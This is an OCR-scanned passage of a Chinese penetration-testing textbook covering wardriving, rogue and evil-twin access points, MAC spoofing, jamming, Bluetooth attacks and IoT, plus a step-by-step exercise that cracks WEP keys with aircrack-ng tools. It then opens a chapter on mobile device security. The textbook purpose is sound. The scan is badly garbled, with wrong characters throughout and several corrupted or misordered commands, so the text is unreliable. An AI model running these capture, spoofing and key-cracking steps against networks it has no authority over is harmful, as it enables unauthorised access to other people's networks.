机 的 视线 ， 除 非 汽 车 已 安全 熄火 或 停放 ; 在 梧 机 视野 内 有 一 个 电脑 屏 磊 在 大 多 数 州 
都 是 非法 的 。 在 你 测试 本 练习 的 操作 时 ， 应 由 其 他 人 开车 。 
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在 开始 本 练习 之 前 ， 需 要 准备 以 下 软 硬 件 : 

@ Vistumbler、KisMAC 等 软件 

@ WiGLE 等 地 图 软件 

@ 硬件 USB GPS 设备 

@ 带 有 无 线 网 卡 的 笔记 本 (请 注意 ， 该 无 线 网 卡 支 持 的 频率 将 是 唯一 可 以 检测 到 
的 频率 ;如果 不 能 满足 要 求 ， 则 需要 配置 外 部 USB 适 配器 ) 

(1) 安装 所 选 的 且 操作 系统 文 持 的 软件 。 

(2) 在 WiGLE 网 站 上 注册 一 个 账户 ， 用 于 上 传 收集 的 有 关 接 入 点 和 位 量 

(3) 确保 无 线 网 卡 或 适配器 的 驱动 程序 已 更 新 到 最 新 版 本 。 

(4) 安装 GPS 设备 ， 并 在 操作 系统 中 加 载 必要 的 驱动 程序 。 

(5) 局 动 软件 (如 Vistumbler)。 

(6) 配置 软件 以 识 WR 

(7) 让 系统 运行 片刻 ， 让 它 检测 无 线 网 络 。 如 果 成 功 ， 则 继续 下 一 步 。 如 果 没 
有 ， 请 参阅 软件 或 硬件 供应 商 的 网 站 ， 以 排除 问题 ， 然 后 再 次 测试 。 

(8) 保持 系统 运行 ， 开 车 四 处 转 转 ， 让 软件 检测 接 入 点 。 

(9) 一 段 时 间 后 ， 可 以 将 活动 日 志保 存 到 硬盘 驱动 器 。 

(10) 在 保存 信息 后 ， 可 以 将 其 上 传 到 WiGLE， 这 将 在 地 图 上 绘 出 发 现 的 位 置 。 


在 这 种 类 型 的 攻击 中 ， 无 线 检测 软件 将 监听 网 络 的 信 标 ， 或 发 送 用 于 检测 网 络 的 探测 
请 求 。 在 检测 到 网 络 后 ， 入 侵 者 即 可 将 其 挑选 出 来 ， 以 便 随后 进行 攻击 。 

此 类 现场 调查 工具 通常 还 具备 连接 到 GPS 设 备 的 能 力 ， 以 将 接 入 点 或 客户 端 精确 定位 
到 几 英 尺 的 范围 内 。 

Wardriving 攻击 还 有 一 些 变种 ， 所 有 这 些 变种 都 有 相同 的 目的 : 


Warflying 
与 Wardriving 一 样 ， 但 使 用 的 测试 平台 是 小 型 飞机 或 超 轻型 飞机 。 


Warballooning 


与 Wardriving 一 样 ， 但 使 用 的 测试 平台 是 一 个 气球 。 


Warwalking 

将 检测 设备 放 在 背包 或 类 似 的 东西 中 ， 然 后 徒步 穿 过 建筑 物 和 其 他 设施 。 

还 有 一 类 与 这 些 方法 同时 进行 的 活动 ， 统 称 为 Warchalking， 即 在 检测 到 无 线 信 号 的 位 
置 的 标记 符号 。 这 些 符号 通知 知情 者 ， 附 近 有 一 个 无 线 接 入 点 ， 并 提供 其 相关 信息 ， 包 
括 开放 或 封闭 的 接 入 点 、 安 全 设置 、 频 道 和 名 称 。 Warchalking 符 号 的 一 些 例 子 如 图 13.11 
所 示 。 
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任意 信息 上 标 
免费 Wi-Fi 例 费 Wi-Fi 受 限 Wi-Fi 
信息 上 标 可 为 SSID 或 周围 可 能 有 提示 攻击 
无 线 网 络 的 管理 密码 手段 的 字 词 或 代码 
收费 访问 Wi-Fi 启用 MAC 地 址 过 滤 
周围 可 能 有 提示 攻击 有 时 附近 会 写 MAC 
手段 的 字 词 或 代码 地 址 列表 


图 13.11 一 些 Warchalking 示 例 


13.4 进行 其 他 类 型 的 攻击 


还 有 其 他 一 些 攻击 无 线 网 络 的 方式 : 

@ 流氓 接 入 点 (Rogue aCCess points) 是 一 种 通过 诱 使 用 户 连接 到 该 接 入 点 来 入 侵 网 络 的 
有 效 途径 。 为 实施 该 攻击 ， 攻 击 方 将 建立 一 个 不 受 公 司 控制 的 接 入 点 。 在 受害 者 
连接 到 接 入 点 后 ， 束 可 能 开始 通过 网 络 传输 信息 (包括 敏感 的 公司 数据 )， 从 而 可 能 
危及 安全 。 通 过 使 用 唾 手 可 得 的 紧 竣 型 硬件 接 入 点 和 基于 软件 的 接 入 点 ， 非 常 容 
易 实 现 此 类 攻击 。 无 论 使 用 哪 种 接 入 点 ， 都 具有 易于 隐藏 和 易于 配置 的 优点 。 一 
种 称 为 MiniPwner 的 硬件 设备 如 图 13.12 所 示 ， 该 设备 可 用 于 设置 流氓 接 入 点 ， 只 需 
要 单 击 几 次 按钮 。 


图 13.12 ”MiniPwner 接 入 点 


@ MAC 欺 骗 人 们 使 用 MAC 过 滤 控 制 哪些 客户 端 可 以 或 不 能 附加 到 接 入 点 。 通 过 使 
用 嗅 探 器 之 类 的 软件 ， 可 以 查看 可 以 连接 到 接 入 点 的 有 效 MAC， 并 进行 针对 性 复 


制 。 对 于 那些 使 用 MAC 过 滤 的 接 入 点 ， 可 以 使 用 MAC 欺 骗 。 通常 ， 可 以 使 用 诸 
如 SMAC 或 ifconfig 之 类 的 工具 来 完成 此 任务 。 然 而 ， 在 某 些 情况 下 ， 网 卡 的 硬件 
配置 选项 不 需要 此 类 应 用 ， 即 可 更 改 MAC 地 址 。 

@ 错误 配置 是 一 个 常见 的 问题 一 一 许多 硬件 和 软件 项 目 都 可 能 配置 错误 。 设 备 的 所 
有 者 可 能 错误 地 配置 设备 ， 并 限制 或 禁止 设备 的 安全 功能 。 无 线 接 入 点 为 无 法 物 
理 连接 到 网 络 的 攻击 者 或 其 他 恶意 方 提供 了 一 个 理想 的 “随时 随地 访问 ”解决 方案 。 

@ 客户 端 误 关联 也 是 攻击 类 型 之 一 ， 该 攻击 始 于 受害 者 连接 到 非 自 身 所 属 网络 上 的 
接 入 点 。 由 于 无 线 信 号 能 够 穿 过 墙壁 和 多 种 其 他 建筑 结构 传播 ， 客 户 端 很 容易 探 
测 到 另 一 个 接 入 点 ， 并 有 意 无 意 地 连接 到 该 接 入 点 。 无 论 是 有 意 还 是 无 意 连 接 ， 
客户 端 都 可 能 会 连接 到 不 安全 的 网 络 ， 也 可 能 同时 仍然 连接 到 一 个 安全 网 络 (从 而 
导致 两 个 网 络 连通 )。 

@ 一 个 混杂 的 客户 端 有 意 提供 大 功率 的 信号 以 达到 恶意 目的 。 无 线 网 卡 尝 试 连接 到 
网 络 时 通常 会 寻找 更 强 的 信号 。 这 样 ， 泥 杂 的 客户 端 即 可 通过 发 送 强 大 的 信号 来 
吸引 用 户 的 注意 。 

@ 男 一 种 可 能 的 攻击 是 干扰 无 线 网 络 使 用 的 射频 信号 。 针 对 5 GHz 和 2.4 GHz 频段 ， 

均 有 专用 的 无 线 网 络 干扰 器 可 用 。 此 攻击 会 导致 网 络 可 用 性 出 现 问题 ， 并 最 终 导 
致 针对 该 区 域 中 接 入 点 的 定向 拒绝 服务 攻击 。 可 以 使 用 专门 设计 的 干扰 器 ， 该 干 
扰 器 能 够 发 射 信 号 ， 压 制 合法 客户 端 并 使 其 无 法 使 用 接 入 点 。 

应 注意 ， 尽 管 干扰 有 效 ， 但 除非 获得 特别 许可 ， 否 则 不 得 进行 。 这 种 情况 的 原因 
是 阻塞 任何 类 型 的 RF 信号 都 是 非法 的 ， 如 果 被 抓获 ， 可 能 会 导致 巨额 的 神 款 。 
大 多 数 干 扰 器 只 能 从 海外 来 源 获 得 。 应 认真 考虑 尝试 这 种 类 型 的 攻击 是 否 确实 必 
要 ， 以 及 如 果 需 要 ， 如 何 获 得 相关 监管 机 构 的 许可 。 

@ 密 饮 攻击 部 分 依赖 于 社会 工程 ， 以 及 对 人 们 使 用 技术 方式 的 了 解 。 用 户 可 以 (并 且 
会 ) 连 接 到 他 们 可 以 找到 的 任何 可 用 的 无 线 网 络 ， 并 可 能 无 意 中 连接 到 一 个 恶意 网 
络 。 在 这 种 情况 下 ， 攻 击 者 可 以 吸引 无 知 或 没有 警惕 性 的 用 户 ， 连 接 到 他 们 自己 
控制 的 接 入 点 。 为 了 实施 此 类 攻击 ， 恶 意 方 必须 设置 一 个 流氓 接 入 点 (通常 在 合法 
的 接 入 点 覆盖 范围 内 )。 由 于 流氓 接 入 点 发 送 更 强大 和 更 清晰 的 信号 ， 可 以 吸引 真 
正 寻 找 接 入 点 已 进行 连接 的 客户 端 。 一 旦 发 生 这 种 情况 ， 恶 意 攻击 者 即 可 选择 查 
看 、 算 改 或 阻止 网 络 流量 。 


13.5 ”选择 攻击 无 线 网 络 的 工具 


有 几 种 可 以 简化 定位 目标 网 络 的 工作 的 工具 和 方法 。 在 定位 无 线 网 络 后 ， 就 有 可 能 对 
其 实施 攻击 。 
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13.5.1 选择 实用 程序 


以 下 方法 可 以 配合 Wardriving 攻 击 使 用 ， 也 可 以 单独 使 用 。 


OpenSignal 
该 应 用 程序 可 以 在 Web 端 (opensignal.com) 或 一 个 移动 设备 上 使 用 。 可 以 使 用 它 绘制 
Wi-Fi 网 络 和 3G /4G 网 络 的 分 布 图 ， 并 将 此 信息 与 GPS 数据 相关 联 。 


KIsmet 
一 种 基于 Linux 的 工具 ， 可 有 效 地 采用 被 动 方式 ， 定 位 无 线 网 络 。 被 动 方式 意味 着 该 
工具 不 会 对 可 能 正在 观察 或 监听 的 人 员 暴露 过 多 信息 。 


InSSlIDer 
该 实用 程序 可 用 于 在 一 个 区 域 中 定位 无 线 网 络 ， 并 提供 有 关 信 道 、 频 率 和 功率 的 
信息 。 


Network Signal Info 
该 应 用 程序 可 用 于 Android 操 作 系 统 ， 能 够 分 析 和 定位 无 线 网 络 。 


Wireshark 

Wireshark 是 一 个 咒 探 程序 ， 也 可 用 于 拦截 来 自 无 线 网 络 的 流量 。 然 而 ， 要 充分 利用 
Wireshark 分 析 无 线 网 络 流量 ， 需 要 使 用 AirPcap USB 适 配器 。 使 用 AirPcap 可 以 将 无 线 流量 
一 直 分 析 到 硬件 层 。 

在 理想 的 条 件 下 ， 这 些 工具 可 以 帮助 找到 以 下 无 线 网 络 的 相关 信息 : 

@ 广播 SSID 

@ 多 个 接 入 点 的 存在 

@ 发 现 隐藏 的 SSID 

@ 使 用 的 验证 方法 


13.5.2 选择 合适 的 无 线 网 卡 


作为 一 名 需要 分 析 无 线 网 络 并 与 之 交互 的 渗透 测试 者 ， 需 要 考虑 使 用 合适 的 无 线 网 
卡 或 适 配 右 。 对 于 大 多 数 无 线 网 卡 中 ， 不 需要 考虑 其 品牌 、 型 写 以 及 制造 商 一 一 大 部 分 
部 能 与 所 使 用 的 工具 和 技术 兼容 。 然而 ， 对 于 可 能 使 用 Wi-Fi 的 移动 设备 (如 平板 电脑 和 手 
机 )， 由 于 其 内 部 适 配 右 通常 不 文 持 所 需 的 高 级 功能 ， 此 时 就 需要 使 用 外 部 适配器 。 

购买 无 线 适配器 时 ， 请 考虑 以 下 事项 : 

@ 正在 使 用 的 操作 系统 

@ 正在 使 用 的 应 用 程序 


渗透 测试 入 门 实战 


@ 是 否 需 要 进行 数据 包 注 入 (Windows 系 统 无 法 执行 数据 包 注 入 ; 如 果 需 要 ， 则 必须 
使 用 Linux) 

@ 驱动 程序 的 可 用 性 

@ 无 线 网 卡 和 芯片 组 的 制造 商 (这 两 者 可 以 分 别 由 不 同 的 制造 商 制 造 ) 

@ 适配器 是 否 同时 文 持 监视 和 混杂 模式 

如 果 使 用 了 虚拟 化 技术 ， 可 能 还 需要 检查 无 线 网 卡 是 否 可 以 与 此 环境 兼容 。 

下 面 介 绍 如 何 综合 使 用 这 些 工 具 ， 尝 试用 Linux 攻 破 WEP。 


练习 13.2: 攻破 WEP 

在 本 练习 中 ， 将 使 用 Linux 与 一 些 工 具 ， 破 解 和 获取 WEP 密 钥 。 

本 练习 使 用 的 Linux 版 本 是 Kali 2.0， 并 且 不 使 用 虚拟 化 环境 。( 如 果 选 择 使 用 虚 
拟 化 环境 ， 则 需要 获得 一 个 USB 无 线 适 配备， 并 请 参阅 虚拟 化 软件 说 明 ， 配 置 适 配 
化， 令 其 被 识别 为 无 线 网 卡 )。 

(1) 在 终端 窗口 中 运行 jwconfig 命 令 ， 获 取 有 关 无 线 网 卡 的 信息 。 

如 果 无 线 网 卡 被 操作 系统 检测 到 ， 它 将 以 前 级 “wlan” 开头， 后跟 一 个 数字 。 
在 大 多 数 情况 下 ， 编 号 将 从 零 开始 ( 即 wlan0)， 并 从 此 递增 。 

(2) 将 无 线 适 配套 设置 为 监视 模式 ， 以 便 接 收 无 线 流 量 。 该 操作 可 以 通过 执行 以 
下 命令 完成 : 


Airmon-—ng start wlan0 


其 中 wlan0 是 适 配 春 的 名 称 。 
(3) 使 用 以 下 命令 捕获 流量 : 


Airodump-—ng start mon0 


其 中 mon0 是 监控 接口 。 
(4) 列 出 本 区 域内 的 无 线 网 络 : 


Airmon-ng mon0 


(5) 在 网 络 列 表 中 ， 找 到 目标 网 络 并 记录 其 BSSID 和 信道 。 

(6) 使 用 airodump-ng 软 件 ， 开 始 从 目标 网 络 捕获 数据 包 : 

airodump-ng -c [信道 ] --bssidq [bssid] [监控 接口 ] 

alrodump-ng -C 11 --bssld 00:09:5B:6F:64:1E mon0 

(7) 为 将 数据 包 注 入 网 络 ， 需 要 等 竺 某 人 连接 网 络 以 获取 其 MAC 地 址 。 

(8) 捕获 MAC 地 址 并 从 airodump 文 件 中 提取 出 来 后 ， 可 以 使 用 aireplay-ng 将 MAC 
作为 ARP 请 求 的 一 部 分 重播 。 捕 获 ARP 数 据 包 ， 然 后 重播 该 ARP 数 和 干 次 ， 以 生成 需要 
破解 WEP 的 IV。 为 此 ， 需 要 伪造 目标 的 MAC 地 址 。 可 以 使 用 aireplay-ng 来 执行 此 操作 。 
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Aireplay-ng -11 -b 00:09:58:6F:64:1F -hh 44:60:57:C8:58:A0 mon0 

Aireplay-ng -[c] -b [AP 的 bssid] -h [目标 的 MAC] [接口 ] 

其 中 c 是 要 监视 的 信道 。 

Airodump 会 将 捕获 的 流量 存 入 本 地 系统 当前 文件 夹 中 的 一 个 文件 。 

(9) 在 捕获 足够 的 流量 后 (许多 情况 下 ， 通 常 需要 大 约 10 万 个 以 上 数据 包 )， 请 按 
Ctrl + C 停 止 捕获 。 

(10) 使 用 aircrack-ng 人 破解 密码 或 密 铀 : 


Alircrack-ng [filename -cap] 

其 中 filename.cap 是 捕获 文件 的 名 称 。 

如 有 果 捕 获 了 足够 的 流量 ，aircrack-ng 将 在 屏幕 上 显示 密 钥 ， 通 常 以 十 六 进 制 格式 
显示 。 只 需要 在 登录 到 远程 AP 时 使 用 这 个 十 六 进 制 密 钥 ， 就 能 够 连接 到 网 络 。 


13.6 ”破解 监 牙 


Wi-Fi 并 非 唯一 的 无 线 技 术 一 一 不 能 遗漏 蓝牙 。 蓝 牙 是 一 种 用 于 创建 个 人 区 域 网 络 
(PAN) 的 短 距离 无 线 通 信 技 术 的 一 系列 规范 。 该 技术 现在 非常 普遍 ， 从 手机 到 汽车 到 游戏 
控制 器 都 在 使 用 。 

蓝牙 是 按照 一 种 用 于 所 有 类 型 设备 通信 的 通用 标准 设计 的 。 该 通信 协议 工作 于 2.4 至 
2.485GHz 的 频段 ， 由 爱立信 公司 于 1994 年 开发 。 

通常 情况 下 ， 蓝 牙 的 有 效 距 离 约 30 英 尺 (10 米 )。 然 而 ， 制 造 商 可 以 选择 在 其 产品 中 使 
用 某 些 措施 或 功能 ， 从 而 大 大 增加 其 产品 的 覆盖 范围 。 使 用 特殊 的 天 线 ， 还 可 以 进一步 扩 

两 个 具有 蓝牙 功能 的 设备 相互 连接 的 过 程 称 为 配对 (pairing)。 任 何 两 个 具有 蓝牙 功能 
的 设备 都 能 够 相互 连接 。 为 此 ， 设 备 通常 需要 处 于 可 发 现状 态 ， 该 状态 下 它 可 以 发 送 其 名 
称 、 类 型 、 提 供 的 服务 以 及 其 他 信息 。 在 设备 配对 时 ， 二 者 将 交换 一 个 预 共享 密 钥 或 连接 
密 钥 。 设备 存储 彼此 连接 密 钥 ， 以 备 将 来 再 配对 时 识别 对 方 。 

与 网 络 技术 非常 相似 ， 每 个 设备 都 有 自己 唯一 的 48 位 标识 符 ， 通 常 是 一 个 为 其 制定 的 
名 称 。 

在 配对 成 功 后 ， 瘟 牙 设备 将 创建 一 个 微微 网 piconet， 即 非常 小 的 网 络 )。 在 该 网 络 
中 ， 任 何 时 刻 最 多 允许 有 一 个 主 设备 和 七 个 活跃 的 从 设备 。 蓝 牙 设 备 的 工作 原理 决定 了 任 
何 两 个 设备 共享 相同 信道 或 频率 的 机 会 非常 低 ， 从 而 保持 最 低 的 冲突 概率 。 
蓝牙 的 问题 之 一 是 它 通常 而 言 是 一 种 非常 短 距离 的 技术 。 然 而 ， 问 题 在 于 该 技术 用 


户 的 先入 为 主 。 许 多 蓝牙 设备 用 户 相 信 ， 由 于 该 技术 有 效 距离 很 短 ， 攻 击 者 需要 在 视 距 内 
才能 有 效 攻 击 ， 因 此 也 很 容易 防御 。 但 事实 并 非 如 此 。 对 于 攻击 者 而 言 ， 入 侵 过 程 很 容 
易 ， 因 为 他 们 需要 的 只 是 软件 、 合 适 的 设备 和 一 些 基本 知识 。 

那么 ， 蓝 牙 的 安全 性 究竟 如 何 ? 这 是 一 个 仍 有 争议 的 问题 ， 但 一 般 而 言 ， 其 安全 性 
仅 限 于 一 些 技术 。 首 先是 跳 频 一 一 在 通信 中 定时 改变 频率 ， 用 来 防止 冲突 或 其 他 问题 。 通 
信 的 主 从 端 都 知道 跳 频 算法 ， 但 外 部 人 员 并 不 能 也 不 应 能 轻易 获得 正确 的 频率 。 第 二 ， 
在 配对 时 交换 一 个 用 于 认证 和 加 密 (128 位 ) 的 预 共 享 密 钥 。 

蓝牙 的 三 种 安全 模式 是 : 


安全 模式 1 
没有 启用 安全 保护 。 


安全 模式 2 
服务 级 安全 性 。 由 一 个 集中 式 安全 管理 器 处 理 身份 验证 、 配 置 和 授权 。 用 户 可 能 未 激 
活该 模式 ， 并 且 其 中 没有 设备 级 的 安全 性 。 


安全 模式 3 

始终 处 于 易 用 状态 的 设备 级 安全 性 。 基 于 密 钥 进行 验证 和 加 密 。 此 模式 在 下 层 连接 上 
实施 了 安全 性 。 

和 Wardriving 十 分 类 似 ， 一 个 在 手机 、 笔 记 本 电脑 或 上 网 本 上 安装 了 软件 的 攻击 者 可 
以 定位 攻击 目标 。 黑 客 只 需要 在 公共 场所 走动 ， 让 软件 完成 所 有 的 工作 ， 他 们 也 可 以 坐 在 
酒店 大 堂 或 餐厅 ， 假 装 他 们 正在 工作 。 黑客 的 整个 过 程 是 自动 的 ， 因 为 正在 使 用 的 软件 
会 扫描 周边 的 蓝牙 设备 。 

当 黑 客 的 软件 找到 并 连接 到 支持 蓝牙 的 手机 时 ， 它 可 以 下 载 联 系 人 信息 、 电 话 号 码 、 
日 历 、 照 片 和 SIM 卡 详细 信息 ; 免费 拨打 长 途 电话 ; 打 骚 扰 电话 ; 还 能 执行 更 多 攻击 。 


13.6.1 监 牙 攻 击 的 类 型 


下 面 介绍 一 些 利用 蓝牙 进行 攻击 的 方法 : 


Bluesnaring 

通过 获取 未 授权 访问 ， 访 问 并 从 目标 设备 下 载 所 有 信息 的 过 程 。 在 极端 情况 下 ， 该 攻 
击 甚至 可 以 为 黑客 开局 发 出 完全 毁灭 的 指令 的 门户 。 

Bluebugging 

在 此 类 攻击 中 ， 攻 击 者 在 设备 上 植 入 软件 ， 使 该 设备 成 为 被 黑客 操纵 的 锁 昕 器 。 如 果 
设备 被 此 攻击 攻破 ， 黑 客 即 可 监听 你 和 你 身边 任何 人 谈论 的 任何 事情 。 


第 13 章 “ 探 则 [攻击 无 线 网 络 村 时 


Bluejacking 
回 司 用 监 牙 的 设备 发 送 未 经 请 求 的 消息 的 过 程 ， 类 似 于 垃圾 邮件 。 


Bluesniffing 

攻击 者 能 够 在 数据 流入 流出 一 个 局 用 蓝牙 的 设备 时 ， 进 行 监 听 。 

这 些 攻 击 中 的 许多 可 以 用 专门 的 软件 和 硬件 进行 。 就 蓝牙 攻击 而 言 ， 必 须 具 有 将 数据 
包 注 入 网 络 的 适配器 ， 且 该 适配器 还 需要 具有 足够 的 通信 距离 ， 以 脱离 受害 者 的 视线 。 目 
前 ， 有 许多 蓝牙 适配器 可 通过 外 部 天 线 将 传输 范围 扩展 到 1000 英 尺 以 上 。 一 种 工业 蓝牙 适 
配器 如 图 13.13 所 示 。 


图 13.13 ”工业 蓝牙 适配器 


13.6.2 关于 监 牙 的 注意 事项 


使 用 蓝牙 设备 时 ， 有 一 些 有 关 设 备 及 其 工作 方式 的 信息 应 当 谨 记 。 首 先 ， 蓝 牙 设备 可 


可 被 发 现 (Discoverable) 
该 模式 允许 设备 被 其 他 蓝牙 设备 扫描 和 定位 。 


限时 可 被 发 现 (Limited Discoverable) 

在 这 种 模式 下 ， 在 一 段 较 短 的 时 间 内 ， 设 备 可 被 其 他 蓝牙 设备 发 现 ， 此 后 回 到 不 可 发 
现 的 状态 。 

个 可 发 现 的 (Nondiscoverable) 

顾名思义 ， 其 他 设备 无 法 找到 此 模式 下 的 设备 。 然 而 ， 如 果 另 一 个 设备 先前 已 经 找到 
了 该 设备 ， 那 么 前 者 仍然 能 够 再 次 找到 后 者 。 

除了 能 够 定位 的 设备 之 外 ， 蓝 牙 设 备 可 以 与 其 他 设备 配对 以 允许 彼此 通信 。 设 备 可 以 
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工作 在 配对 或 非 配对 模式 下 。 在 配对 模式 下 ， 它 可 以 与 男 一 个 设备 连接 。 


13.7 ” 物 联 网 黑客 技术 


在 此 还 不 能 结束 本 半 ， 因 为 尚未 介绍 作为 一 名 渗透 测试 者 所 必须 了 解 的 一 项 技术 : 
物 联 网 (Internet of Things，IoT)。 IoT 是 一 个 流行 词 ， 用 于 指数 量 不 断 增 长 ， 可 连接 到 
Internet， 但 叉 不 太 适 合 归 于 计算 机 或 其 他 设备 类 别 的 种 种 设备 。 例 如 ， 诸 如 家 电 、 传 感 
器 、 智 能 家 大 系统 、 和 车 载 多 媒体 系统 、 可 穿戴 计算 设备 等 设备 ， 以 及 所 有 连接 到 Internet 以 
进行 数据 交换 的 设备 都 属于 物 联 网 范畴 。 此 类 系统 通常 具有 骨 入 式 操 作 系 统 和 可 配置 为 
连 入 家 庭 或 商业 网 络 的 无 线 或 有 线 网 卡 。 

从 安全 的 角度 来 看 ， 这 些 设 备 的 问题 就 是 它们 大 多 数 没 有 任何 安全 性 科研 。 这 些 设备 
中 的 许多 由 在 为 消费 者 或 企业 提供 特定 的 功能 ， 通 常 这 意味 着 很 少 或 完全 不 关注 安全 性 。 
缺少 安全 措施 可 能 是 网 络 管理 员 的 灾难 一 一 却 为 渗透 测试 者 提供 了 入 口 。 

站 在 渗透 测试 者 的 角度 ， 可 能 会 希望 使 用 工具 扫 拉 局 用 无 线 功 能 的 设备 ， 答 试 寻找 
IoT 设 备 。 找 到 此 类 设备 后 ， 可 以 使 用 banner 抓 取 或 端口 扫描 ， 尝 试 识 别 该 设备 。 如 果 访 
设备 可 识别 ， 继 续 研 究 是 否 可 以 找到 可 以 利用 的 潜在 入 口 点 或 漏洞 。 如 果 方 法 正确 ， 即 可 
使 用 攻陷 的 设备 作为 更 深入 地 攻击 目标 网 络 的 一 个 文 撑 点 ， 或 出 发 点。 

站 在 防御 者 的 角度 ， 这 些 设备 不 仅 需要 评估 安全 问题 ， 而 且 要 将 其 置 于 目 身 的 特殊 网 
段 上 。 为 了 提高 安全 性 ， 需 要 通过 Internet 直 接 访 问 的 任何 对 象 都 应 该 被 分 割 到 自己 的 网 
段 中 ， 并 限制 对 该 网 段 的 访问 。 然 后 ， 应 该 监控 该 网 段 以 识别 可 能 的 异常 流量 ， 如 果 出 现 
问题 ， 应 采取 行动 。 


13.8 “本章 小 结 


除 标准 有 线 网 络 外 ， 你 还 将 会 用 到 越 来 越 多 的 无 线 网 络 和 设备 。 在 本 章 中 ， 介 绍 了 
WEP、WPA 和 WPA2 等 保护 技术 可 以 被 攻破 。 使 用 诸如 天 线 知识 和 接 入 点 布置 等 其 他 技 
术 ， 可 以 实现 从 远 距离 对 无 线 网 络 和 设备 进行 攻击 和 阻 断 ， 并 降 低 攻击 被 检测 到 的 概率 。 
渗透 测试 者 需要 了 解 所 有 这 些 技术 ， 以 确保 能 够 对 无 线 网 络 进行 正确 评估 ， 并 建议 恰当 的 
修复 方案 。 


13.9“” 寺 题 


l 
2 
3 
4 
> 


. 蓝牙 和 Wi-Fi 网 络 有 什么 区 别 ? 

. 八木 天 线 和 平板 天 线 有 何 区 别 ? 

. 昨 牙 网 络 的 履 关 范围 是 多 少 ? 如 何 扩展 ? 

. 什么 会 缩短 无 线 网 络 的 覆 荔 范围 ， 限 制 其 性 能 ? 
. 何谓 物 联 网 ? 

. IoT 最 大 的 问题 是 什么 ? 
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第 14 章 


移动 设备 安全 


在 今天 这 个 互联 的 世界 中 ， 一 般 人 至 少 拥有 四 人 台 移 动 设备 。 事 实 上， 一 些 人 已 用 他 们 
的 管 能 手机 取代 了 传统 平台 。 这 是 很 有 可 能 的 ， 因 为 在 过 去 的 几 年 里 ,移动 设备 在 性 能 、 
功能 和 灵活 性 等 方面 都 有 所 提高 。 

除 智 能 手机 外 ， 还 有 越 来 越 多 的 设备 可 以 冠 以 “移动 ”之 名 。 它 们 包括 健身 跟踪 器 、 
智能 手表 ， 甚 至 还 有 虚拟 现实 设备 。 人 们 依靠 这 些 设备 ， 向 他 们 提供 关于 周围 世界 的 信 
息 ， 而 这 些 设备 也 使 得 记录 和 和 跟踪 大 量 过 去 无 法 收集 和 记录 的 数据 成 为 可 能 。 由 于 这 些 数 
据 由 移动 设备 收集 ,存储 在 移动 设备 上 ， 甚 至 被 上 传 到 云 系统 中 ,攻击 者 越 来 越 多 地 将 注 
意 力 转向 移动 设备 及 其 信息 。 

作为 一 名 渗透 测试 人 员 ， 你 需要 了 解 移动 设备 的 工作 方式 ， 以 及 它们 向 工作 场所 或 者 
其 存在 的 任何 环境 引入 的 问题 。 现 实情 况 是 ， 移 动 设备 将 以 持续 加 快 的 速度 涌现 ， 任 何 有 
能 力 的 测试 人 员 都 应 将 它们 纳入 考虑 。 


本 章 将 学 习 : 
”识别 移动 设备 的 组 成 
了 解 移动 设备 应 具备 的 功能 
多 识别 移动 平台 特有 的 安全 问题 


MN 


14.1 认识 当今 的 移动 设备 


在 过 去 十 年 里 ， 移 动 设备 已 经 发 生 了 翻天 履 地 的 变化 。 竺 重 、 性 能 不 足 和 名 不 副 实 设 
备 的 时 代 已 经 一 去 不 复 返 。 当 前 移动 设备 的 先驱 一 一 工 Mobile sidekick， 于 2002 年 在 美国 
首次 亮相 。 与 今天 的 智能 设备 相 比 ， 这 款 设 备 虽 然 性 能 不 足 、 功 能 有 限 ， 但 是 它 代 表 着 现 
代 形 式 移动 设备 的 开端 ， 对 今天 的 世界 产生 巨大 影 啊 。 

接 下 来 的 几 年 一 直到 今天 出 现 的 移动 设备 ， 始 于 三 星 、 详 基 亚 、 爱 立信 等 多 家 制造 商 
推出 的 智能 手机 。 虽 然 在 头 几 年 里 ， 这 些 设 备 在 性 能 和 功能 方面 也 有 进步 ， 但 是 直到 2007 
年 ， 苹 果 推 出 其 备 受 欢迎 的 iPhone 手机 ， 才 令 移动 设 备 开 始 飞 入 寻 利 折 姓 家 。iPhone 还 加 
速 了 现今 很 多 厂商 的 不 同形 式 的 更 加 先进 手机 的 研发 。 在 2007 年 到 2016 和 年间， 苹果 已 经 问 
世界 范围 内 泡 望 使 用 最 新 技术 的 人 卖 出 了 数 以 百 万 计 的 iPhone。 此 后 ， 很 多 其 他 厂商 也 各 
自 推 出 了 智能 手机 ， 这 不 仅 造成 硬件 类 型 的 差异 ， 而 且 导 致 出 现 了 不 同类 型 的 操作 系统 


(Android、 黑 每 甚至 Windows Mobile)。 

除了 智能 手机 外 ， 还 有 一 个 流行 的 平板 电脑 市 场 。2000 年 前 的 平板 电脑 与 今天 我 们 认 
为 有 用 的 平板 电脑 相 比 ， 其 体积 庞大 ， 而 且 性 能 不 足 。 直 到 2010 年 ， 随 着 苹果 推出 iPad， 
公众 才 开 始 全 面 接 受 这 一 技术 。iPad 同 人 们 证 明 ， 平 板 电 脑 可 以 非常 轻便 小 巧 ， 电 池 续 航 
优秀 ， 并 且 具 备 多 种 之 前 的 机 型 所 没有 的 功能 。 

随 着 智能 手机 和 平板 电脑 的 进化 ， 驱 动 和 运行 这 些 设备 的 操作 系统 也 在 不 断 进 化 。 特 
别 是 Google 的 Android 操 作 系 统 ， 已 经 发 生 了 巨大 的 变化 ， 并 且 演 变 还 在 继续 。Android 操 
作 系 统 的 开源 特性 ， 使 得 开发 人 员 能 够 对 运行 在 其 他 设备 (包括 罕 戴 式 设 备 、 平 板 电脑 显 
示 器 ， 其 至 有 线 电 视 盒 ) 上 的 操作 系统 进行 优化 和 调整 ， 以 及 改进 。 


14.1.1 ”移动 操作 系统 的 版 本 和 类 型 


使 用 移动 设备 带 来 的 最 大 问题 之 一 就 是 数据 的 安全 性 ， 尤 其 是 在 工作 场所 中 使 用 时 。 
制造 设备 及 其 操作 系统 的 供应 商 已 经 找到 了 许多 在 保留 设备 可 用 性 和 功能 的 同时 处 理 安全 
问题 的 方法 。 设 备 生 产 商 已 经 在 设备 中 集成 和 采用 了 使 用 加 密 、 许 可 和 不 同形 式 的 号 份 验 
证 等 技术 的 能 力 ， 并 且 取 得 了 不 同 程度 的 成 功 。 供 应 商 必 须 得 出 设备 的 安全 性 和 易 用 性 之 
间 的 最 佳 平 衡 点 。 可 以 配置 环境 使 其 更 加 安全 ， 但 是 这 种 安全 往往 会 以 降低 设备 的 易 用 性 
为 代价 。 

另 一 方面 ， 易 于 使 用 的 设备 往往 会 牺牲 某 种 程度 的 安全 性 。 例 如 ， 一 台 和 希望 采用 加 密 
